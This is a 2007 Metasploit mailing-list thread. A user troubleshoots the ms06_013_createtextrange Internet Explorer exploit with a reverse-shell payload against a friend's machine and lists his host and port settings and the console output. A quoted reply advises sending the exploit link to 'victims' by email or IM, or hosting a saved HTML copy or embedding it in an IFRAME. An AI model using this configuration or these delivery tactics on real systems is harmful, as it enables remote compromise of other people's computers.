[framework] Internet Explorer createTextRange() Code Execution
Rory Garton Smith
eresemeth at gmail.com
Wed Apr 4 06:34:08 CDT 2007
Thankyou for all responding so fast. I did what you said, however it didn't
quite work.
My friend and I were trying to exploit his computer this time, using the
same as before (windows/browser/ms06_013_createtextrange) with the payload
as (generic/shell_reverse_tcp), my local ip is 10.1.1.5, his router IP is
(for the sake of conversation) 124.181.130.145.
I set up the exploit so that
SRVHOST - 10.1.1.5
SRVPORT - 49160 (A port I have forwarded from my router to my computer which
is 10.1.1.5 obviously)
LHOST - 124.181.130.145 (His IP)
LPORT - 5000 (A port he has forwarded from his router)
This exploit ran in the console and came out with the same as last time
[*] Started reverse handler
[*] Using URL: http://10.1.1.5:49160/PwPYpHE
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_013_createtextrange) >
Upon this, I did as was suggested previously, and sent him the URL
http://10.1.1.5:49160/PwPYpHE and then opened it myself in internet
explorer, as did he. However, all that came up was a series of numbers
moving upwards towards 100. He has no firewalls on and neither do I. He was
using internet explorer 6 which is the target I was using as well.
I'm sure there is some critical error I made..perhaps confusing server and
host or similar? Any assistance would be wildly appreciated,
Thankyou So much, sorry to trouble
Erez
On 4/4/07, Donnie Werner <morning_wood at frame4.com> wrote:
>
> > All of the browser exploits work the same way -- you run the exploit,
> the
> > exploit creates a listening web server and a URL handler. To get code
> > execution, you need to send vulnerable clients to your web server. How
> > you do this depends on the situation, but the easiest way is to just
> > email or instant message the link to the victims.
>
> I have had very good success with client side exploits in Metasploit.
> My best results come from launching the exploit, create a local html
> file pointing to the exploit server. Open file via browser, right click
> link and save as. What you have now is a standalone html file
> with all the code in it. Simply host this file or imbed as an IFRAME,
> send your targets to your hosted file. enjoy!
>
> This has worked nearly flawlessly, and there is no need to keep your
> MSF open, running, or listening.
>
> cheers,
> Donnie ( M.W ) Werner
> http://www.zone-h.org
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070404/2a4d8229/attachment.htm
More information about the framework
mailing list